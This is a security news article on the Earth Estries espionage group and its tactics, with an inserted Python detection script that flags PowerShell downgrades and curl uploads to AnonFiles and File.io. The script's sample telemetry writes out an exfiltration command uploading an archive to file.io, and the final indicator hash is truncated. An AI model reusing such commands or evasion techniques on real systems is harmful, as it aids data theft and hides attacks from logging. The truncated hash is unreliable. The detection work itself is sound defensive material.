Sophisticated Earth Estries Group Hack Government Agencies and Tech Companies

Feb 16, 2025 · 4 min read

Earth Estries, a new and sophisticated cyber espionage group which overlaps with the notorious threat group FamousSparrow, has been unveiled.

The group has been active since 2020 and targets multiple government and technology organizations using hacking tools and backdoors.

Trend Micro has released the latest research report regarding the tactics and techniques used by this group.

The group uses PowerShell downgrade attacks to evade the logging mechanism of the Windows Antimalware Scan Interface (AMSI).

Hacker Group Attack Chain

For initial infection, the group targets accounts with administrative privileges and compromises one of the victim’s internal servers.

It then employs backdoors and hacking tools for lateral movement over Server Message Block (SMB) and the WMI command line (WMIC).

The group uses various information stealers, browser data stealers, and port scanners to further the attack, and it frequently deploys backdoors such as Zingdoor, TrillClient, and HemiGate.


In addition, it uses commonly available remote-control tools such as Cobalt Strike, PlugX, or Meterpreter stagers. These tools are delivered as encrypted payloads that are loaded by custom loader DLLs.

After each malware deployment, the group archives the collected data in a folder. It targets PDF and DDF files and uploads them to AnonFiles or File.io via curl.exe.
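As an added illustration (not part of the original article or of Trend Micro's report), the following Python helper shows how a defender might surface two of the behaviours described above in endpoint telemetry: a PowerShell engine downgrade to version 2.0, which predates AMSI and script block logging, and curl.exe uploads to AnonFiles or File.io. The event records, hostnames, version strings and command lines are constructed samples, and the field names (type, host, image, cmdline, engine_version, host_version) are assumptions about an EDR export format rather than any real product's schema.

```python
import re

# Windows PowerShell 2.0 predates AMSI and script block logging, so forcing a
# modern host to start the 2.0 engine is the "downgrade" the article describes.
# Matches "-Version 2", "-v 2", "-ver 2.0" (PowerShell accepts unambiguous
# parameter prefixes) but not "-Version 5".
DOWNGRADE_RE = re.compile(
    r"(?:^|\s)-v(?:e|er|ers|ersi|ersio|ersion)?\s+2(?:\.0)?(?=\s|$)", re.IGNORECASE
)

# Anonymous file-sharing services the article says the group uploads to via curl.exe.
ANON_UPLOAD_HOSTS = ("anonfiles.com", "file.io")
URL_HOST_RE = re.compile(r"https?://([^/\s\"']+)", re.IGNORECASE)


def _image_name(event: dict) -> str:
    """Basename of the process image, lower-cased (handles both slash styles)."""
    return event.get("image", "").replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_powershell_downgrade(event: dict) -> bool:
    """Process-creation event: powershell.exe launched with a version-2 switch."""
    if _image_name(event) not in ("powershell.exe", "powershell_ise.exe"):
        return False
    return bool(DOWNGRADE_RE.search(event.get("cmdline", "")))


def is_engine_downgrade(event: dict) -> bool:
    """PowerShell engine-start event: a 2.x engine running inside a newer host.

    engine_version / host_version are assumed field names for the
    EngineVersion / HostVersion values of Windows PowerShell event ID 400.
    """
    engine = event.get("engine_version", "")
    host = event.get("host_version", "")
    return engine.startswith("2.") and bool(host) and not host.startswith("2.")


def is_anon_upload(event: dict) -> bool:
    """Process-creation event: curl.exe talking to an anonymous file-sharing host."""
    if _image_name(event) != "curl.exe":
        return False
    for raw in URL_HOST_RE.findall(event.get("cmdline", "")):
        host = raw.lower().split("@")[-1].split(":")[0]  # drop user@ and :port
        if any(host == d or host.endswith("." + d) for d in ANON_UPLOAD_HOSTS):
            return True
    return False


def triage(events: list) -> list:
    """Return (hostname, finding) pairs for every event that matches a rule."""
    findings = []
    for ev in events:
        if ev.get("type") == "process" and is_powershell_downgrade(ev):
            findings.append((ev["host"], "powershell-downgrade-cmdline"))
        elif ev.get("type") == "ps_engine" and is_engine_downgrade(ev):
            findings.append((ev["host"], "powershell-downgrade-engine"))
        elif ev.get("type") == "process" and is_anon_upload(ev):
            findings.append((ev["host"], "curl-anonymous-upload"))
    return findings


# Constructed sample telemetry: hostnames, paths, versions and command lines
# are illustrative only and do not come from the article or any real incident.
SAMPLE_EVENTS = [
    {"type": "process", "host": "srv01",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Version 2 -Command Get-Process"},
    {"type": "process", "host": "ws02",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Date"},
    {"type": "ps_engine", "host": "srv01",
     "engine_version": "2.0", "host_version": "5.1.19041.1"},
    {"type": "ps_engine", "host": "ws02",
     "engine_version": "5.1.19041.1", "host_version": "5.1.19041.1"},
    {"type": "process", "host": "srv01",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r'curl.exe -F "file=@C:\Users\Public\archive.rar" https://file.io'},
    {"type": "process", "host": "ws02",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe -sS https://updates.example.com/manifest.json -o manifest.json"},
]

if __name__ == "__main__":
    for host, finding in triage(SAMPLE_EVENTS):
        print(f"{host}: {finding}")
```

Run against the constructed sample, only the srv01 events are flagged. The engine-start check is the more robust of the two PowerShell rules, since it fires on the version that actually started regardless of how the command line was obfuscated; the command-line rule is cheap to apply to process-creation logs that are already collected.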

To avoid detection, the group deploys a new piece of malware each time it starts an operation. Its C&C servers are hosted on virtual private server (VPS) services located in different countries, and it uses Fastly CDN services to hide their IP addresses.

They target organizations in the government and technology industries based in the Philippines, Taiwan, Malaysia, South Africa, Germany, and the US.

In addition, the actors abuse public services such as GitHub, Gmail, AnonFiles, and File.io to exchange or transfer commands and stolen data.

Indicators of Compromise

cd2b703e1b7cfd6c552406f44ec05480209003789ad4fbba4d4cffd4f104b0a0
0eaa67fe81cec0a41cd42866df1223cb7d2b5659ab295dffe64fe9c3b76720aa
e6f9756613345fd01bbcf28eba15d52705ef4d144c275b8cfe868a5d28c24140
c7023183e815b9aff68d3eba6c2ca105dbe0a9b05cd209908dcee907a64ce80b
1a9e0c7c88e7a8b065ec88809187f67d920e7845350d94098645e592ec5534f6
efb98b8f882ac84332e7dfdc996a081d1c5e6189ad726f8f8afec5d36a20a730
8476ad68ce54b458217ab165d66a899d764eae3ad30196f35d2ff20d3f398523
dff1d282e754f378ef00fb6ebe9944fee6607d9ee24ec3ca643da27f27520ac3
42d4eb7f04111631891379c5cce55480d2d9d2ef8feaf1075e1aed0c52df4bb9
45b9204ccbad92e4e5fb9e31aab683eb5221eb5f5688b1aae98d9c0f1c920227
98e250bc06de38050fdeab9b1e2ef7e4d8c401b33fd5478f3b85197112858f4e
b1bc10fa25a4fd5ae7948c6523eb975be8d0f52d1572c57a7ef736134b996586
49a0349dfa79b211fc2c5753a9b87f8cd2e9a42e55eca6f350f30c60de2866ce
ca6713bedbd19c2ad560700b41774825615b0fe80bf61751177ffbc26c77aa30
cdadad8d7ced1370baa5d1ffe435bed78c2d58ed4cda364b8a7484e3c7cdac82
f3384723b21f9a928029bb3ee116f9adbc4f7ec66d5a856e817c3dc16d149d41
5e0893ce227464fb29d76e0500c518935d11379d17fb14effaef82e962ff76f6
223d956df81dcb6135c6ce00ee14d0efede9fb399b56d2ee95b7b0538fe12c

Source: CybersecurityNews.com
